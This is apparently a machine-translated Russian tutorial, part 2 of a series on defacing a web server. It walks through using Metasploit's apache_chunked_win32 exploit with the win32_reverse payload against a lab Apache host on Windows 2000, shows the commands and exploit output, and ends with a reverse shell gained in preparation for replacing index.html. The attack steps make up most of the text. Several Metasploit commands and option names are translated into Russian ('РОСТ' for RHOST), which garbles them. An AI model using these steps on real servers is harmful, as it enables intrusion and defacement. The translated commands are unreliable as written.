Дефейс веб-сервера (часть 2)
Дефейс веб-сервера (часть 2)
Я быстро подытожу с того места, на котором остановилась первая часть этой серии статей. В первой части было кратко описано, как можно стереть веб-сервер, и был представлен инструмент, который мы будем использовать для самостоятельного выполнения такого стирания. Прежде чем мы продолжим, я хотел бы еще раз отметить, что воссоздание эксплойтов или, в данном случае, дефейсов веб-сервера, является законным упражнением в компьютерной безопасности. Однако это необходимо делать в компьютерной лаборатории, как подробно описано в первой части. Недостаточно просто знать, как что-то работает, в идеале нужно уметь заставить это работать самостоятельно. На этой ноте давайте продолжим использовать инструмент Metasploit, чтобы углубить наше понимание искажений веб-сервера.
От теории к реальности
С этого момента мы продолжаем изучать инструмент Metasploit и то, как он используется. Именно с помощью этого инструмента мы получим доступ на системном уровне к веб-серверу Apache. Получение обратной оболочки — это то, что позволит нам загрузить наш измененный файл index.html, который является страницей по умолчанию, обслуживаемой веб-сервером, например: журнал вашей компании.
Ниже показано, что даст вам команда «показать эксплойты» при вводе в приглашении msf в Metasploit. Появится список доступных эксплойтов.
msf > показать эксплойты
Загруженные эксплойты Metasploit Framework
=====================================
Кредиты | Кредиты платформы Metasploit |
afp_loginext | AppleFileServer LoginExt PathName Buffer Overflow |
apache_chunked_win32 | Фрагментированное кодирование Apache Win32 |
blackice_pam_icq | ISS PAM.dll ICQ Parser Buffer Overflow |
distcc_exec | Выполнение команды демона DistCC |
exchange2000_xexch50 | Exchange 2000 MS03-46 Переполнение кучи |
frontpage_fp30reg_chunked | Начальная страница fp30reg.dll фрагментированное кодирование |
ia_webmail | IA WebMail 3.x Переполнение буфера |
iis50_nsiislog_post | Переполнение POST IIS 5.0 nsiislog.dll |
iis50_printer_overflow | Переполнение буфера принтера IIS 5.0 |
iis50_webdav_ntdll | Переполнение IIS 5.0 WebDAV ntdll.dll |
Итак, мы видим, что перечислены несколько эксплойтов, доступных в рамках фреймворка. Я сократил список, но когда вы введете ту же команду, что и я, вы получите полный список. Мы собираемся использовать второй сверху: apache_chunked_win32.
Теперь я введу команду, чтобы выбрать эксплойт, который мы собираемся использовать, как показано ниже.
msf> используйте apache_chunked_win32
msf apache_chunked_win32 >
Как видно выше, наше приглашение возвращается, и оно показывает, что мы используем выбранный нами эксплойт: apache_chunked_win32. Отсюда мы теперь введем указанную ниже команду, чтобы проверить различные параметры, связанные с этим эксплойтом в рамках.
msf apache_chunked_win32> показать параметры
Параметры использования
===============
Эксплойт: | Имя | По умолчанию | Описание |
——— | —— | ——- | —————— |
по желанию | SSL | Использовать SSL | |
требуется | РОСТ | Целевой адрес | |
требуется | ОТЧЕТ | 80 | Целевой порт |
Цель: Windows NT/2K Brute Force
msf apache_chunked_win32>
Теперь у нас снова есть приглашение и список параметров, которые нам нужно заполнить, например, IP-адрес удаленного хоста. Обратите внимание, что вам также потребуется ввести IP-адрес локального хоста, т. е. адрес вашей атакующей машины в настройках лаборатории. Вам необходимо ввести команды для установки этих параметров, как указано ниже;
msf apache_chunked_win32 > установить RHOST 192.168.1.101
РОСТ -> 192.168.1.101
msf apache_chunked_win32 >
Мы установим параметр LHOST чуть позже в этой статье.
Вы бы посмотрели на эти варианты эксплойтов!
Теперь мы установили это поле, и нас снова ждет подсказка. Отсюда мы перейдем к другим различным параметрам, которые нам нужно установить, прежде чем использовать этот эксплойт, чтобы получить доступ на системном уровне к веб-серверу. В нашем случае мы теперь будем использовать следующую команду, чтобы увидеть, какие полезные нагрузки мы можем использовать.
msf apache_chunked_win32 > показать полезные нагрузки
Используемые полезные нагрузки Metasploit Framework
=====================================
win32_bind | Оболочка привязки Windows |
win32_bind_dllinject | Внедрение Windows Bind DLL |
win32_bind_stg | Оболочка поэтапной привязки Windows |
win32_bind_stg_upexec | Загрузка/выполнение поэтапной привязки Windows |
win32_bind_vncinject | Внедрение DLL сервера Windows Bind VNC |
win32_reverse | Обратная оболочка Windows |
win32_reverse_dllвнедрить | Обратное внедрение DLL в Windows |
win32_reverse_stg | Поэтапная обратная оболочка Windows |
win32_reverse_stg_ie | Windows Reverse InlineEgg Stager |
win32_reverse_stg_upexec | Поэтапная обратная загрузка/выполнение Windows |
win32_reverse_vncinject | Инъекция DLL обратного VNC-сервера Windows |
msf apache_chunked_win32>
Вау! Неплохой выбор для игры, не так ли? Это действительно часть красоты Metasploit Framework. Это позволит вам использовать любое «яйцо», которое вы выберете. Под «яйцом» я подразумеваю любую полезную нагрузку, которую вы будете выполнять на ЦП жертвы после того, как воспользуетесь уязвимостью, на которую нацелены. Наличие такого широкого выбора является одним из замечательных применений этого инструмента безопасности.
Из того, что мы видим выше, нам доступно множество вариантов. В нашем случае мы будем использовать полезную нагрузку win32_reverse. Почему? Ну, нам нужна оболочка, которую мы можем использовать для пересылки вещей туда и обратно. Чтобы быть точным, мы хотим скопировать файл index.html и внести в него некоторые изменения, т.е. исказить его. Наличие оболочки позволит нам сделать именно это. Что ж, в этой заметке нам нужно сообщить Framework, что нам нужен этот вариант полезной нагрузки. Пожалуйста, смотрите ниже синтаксис.
msf apache_chunked_win32 > установить ПОЛЕЗНУЮ НАГРУЗКУ win32_reverse
ПОЛЕЗНАЯ НАГРУЗКА -> win32_reverse
msf apache_chunked_win32 (win32_reverse) >
Итак, теперь мы установили эту полезную нагрузку и вернули нашу подсказку. Что делать дальше? О да! Нам нужно установить IP-адрес для получения обратного шелла. Помните, несколько шагов назад мы установили RHOST, чтобы указать атакуемую машину? Ну, нам также нужно сделать то же самое, чтобы установить хост-получатель. Пожалуйста, смотрите ниже.
msf apache_chunked_win32(win32_reverse) > установить LHOST 192.168.1.102
ЛХОСТ -> 192.168.1.102
msf apache_chunked_win32 (win32_reverse) >
Теперь мы готовы запустить эксплойт. Синтаксис для этого показан ниже.
msf apache_chunked_win32(win32_reverse) > эксплойт 192.168.1.101
[*] Запуск обратного обработчика.
[*] Попытка использовать Windows 2000 с возвратом 0x1c0f143c с заполнением 348…
[*] Попытка эксплойта Windows NT с возвратом 0x1c0f1022 с заполнением 348…
[*] Попытка использовать Windows 2000 с возвратом 0x1c0f143c с заполнением 352…
[*] Попытка эксплойта Windows NT с возвратом 0x1c0f1022 с заполнением 352…
[*] Попытка взлома Windows 2000 с возвратом 0x1c0f143c с заполнением 356…
[*] Попытка взломать Windows NT, используя return 0x1c0f1022 с заполнением 356…
[*] Попытка взломать Windows 2000, используя return 0x1c0f143c с отступом 360…
[*] Есть соединение с 192.168.1.101:1031Microsoft Windows 2000 [версия 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.C:Program FilesApache GroupApache>
Итак, выше мы видим, что теперь у нас есть командная строка в самом каталоге Apache. В этом случае мы могли использовать еще один вариант; это «целевой» параметр для указания используемой операционной системы. Даже если не указано, он попытается сделать все, что может. Чтобы использовать целевую опцию, сделайте следующее;
msf apache_chunked_win32 (win32_reverse) > показать цели
Затем появится список целей. Все, что вам нужно сделать, это выбрать тот, который вы хотите, и установить его, как мы сделали выше;
msf apache_chunked_win32(win32_reverse) > установить ЦЕЛЬ 1
Это войдет в цель 1, которая, если мне не изменяет память, является W2K Pro.
Что ж, пока мы проделали изрядный объем работы. Веб-сервер Apache был скомпрометирован нами, и у нас есть обратная оболочка, как показано выше. С этой обратной оболочкой и доступом на системном уровне машина полностью принадлежит нам, чтобы играть и манипулировать ею. Итак, на этой ноте мы закончим вторую часть этой серии статей и продолжим в последней части. В третьей части мы на самом деле займемся дефейсом веб-страницы, а также заглянем внутрь атаки. Тогда увидимся!
искажений веб-сервера (часть 1)